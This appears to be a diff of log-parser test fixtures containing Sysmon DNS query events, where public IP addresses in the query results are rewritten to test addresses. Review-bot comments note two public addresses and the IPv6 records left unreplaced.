@@ -7052,7 +7052,7 @@ "ProcessId": "2736", "QueryName": "sync.jivox.com", "QueryStatus": "0", - "QueryResults": "::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, 
@@ -7080,7 +7080,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -7089,7 +7089,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 
UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
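Review bot: Two public addresses survive the rewrite on the new side of this hunk: `::ffff:198.7.56.229;::ffff:198.7.56.231` are kept verbatim while every neighbouring `::ffff:` entry became 89.160.20.156, and the same pair is kept in the `QueryResults` field of hunk @@ -7113. 198.7.56.0/24 is neither a private nor a documentation range, so this looks like an omission from the replacement pass rather than a deliberate exception; if it is deliberate, the PR description should say so. The IPv6 entries such as `2001:503:a83e::2:30` are also left untouched across all hunks; whether they need the same treatment depends on whether the supported-subset check applies to IPv6, which this diff does not show.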
@@ -7113,7 +7113,7 @@ "ProcessId": "2736", "QueryName": "b1sync.zemanta.com", "QueryStatus": "0", - "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5", + "QueryResults": "type: 5 
b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
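Review bot: Two real public addresses, `::ffff:198.7.56.229` and `::ffff:198.7.56.231`, survive in the new QueryResults value of this hunk while every neighbouring answer was rewritten to `::ffff:89.160.20.156`, and the IPv6 glue records (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, …) are likewise untouched although their IPv4 counterparts became `192.168.x.30`. If the intent stated in the changelog ("change test public IPs to the supported subset") is to keep fixtures inside that subset, these should be rewritten as well, or the exception called out in the changelog entry so the next contributor does not "fix" them inconsistently. Collapsing roughly thirty distinct answers into one repeated address also removes what appears to be this event's only multi-valued resolved-IP case, so it is worth confirming that array/dedup handling of resolved IPs downstream is still exercised by another sample. This file is presumably generated expected output, so the actual fix belongs in the raw test input that produces it, which is outside this diff.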
@@ -7144,7 +7144,7 @@ "event_data": { "QueryName": "tg.socdm.com", "QueryStatus": "0", - "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.619", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7161,7 +7161,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -7173,7 +7173,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7199,7 +7199,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;", + "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.620", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7222,7 +7222,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -7244,7 +7244,7 @@ "event_data": { "QueryName": "ul1.dvtps.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.811", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7305,7 +7305,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData 